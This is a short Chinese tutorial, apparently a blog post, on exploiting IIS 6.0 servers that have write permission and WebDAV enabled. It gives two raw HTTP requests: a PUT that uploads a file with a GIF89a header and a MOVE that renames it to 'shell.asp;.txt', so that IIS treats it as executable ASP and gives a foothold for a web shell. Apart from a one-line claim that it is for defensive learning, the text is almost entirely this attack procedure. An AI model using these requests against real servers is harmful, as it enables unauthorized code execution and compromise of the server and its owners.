前言
如果IIS6.0开启了写权限,且开启了WebDAV功能,利用写入漏洞上传文件
本文仅用于网络信息防御学习
上传文件
request1 2 3 4
| PUT /test.txt HTTP/1.1 Host: 127.0.0.1
GIF89a
|
修改文件位置
- 如果IIS中的文件名或目录名中出现
.asp;
关键字,则在访问时会被当作代码执行
request1 2 3
| MOVE /test.txt HTTP/1.1 Host: 127.0.0.1 Destination: http://127.0.0.1/shell.asp;.txt
|
完成
参考文献
哔哩哔哩——逆风微笑的代码狗